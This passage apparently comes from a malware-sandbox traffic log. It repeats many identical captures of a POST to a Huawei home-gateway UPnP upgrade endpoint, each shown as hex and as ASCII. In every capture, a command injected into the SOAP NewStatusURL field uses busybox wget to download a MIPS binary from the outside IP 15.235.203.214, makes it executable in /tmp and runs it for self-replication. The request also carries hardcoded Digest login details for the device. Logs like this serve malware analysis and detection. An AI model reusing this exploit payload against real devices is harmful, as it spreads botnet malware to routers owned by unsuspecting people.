70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 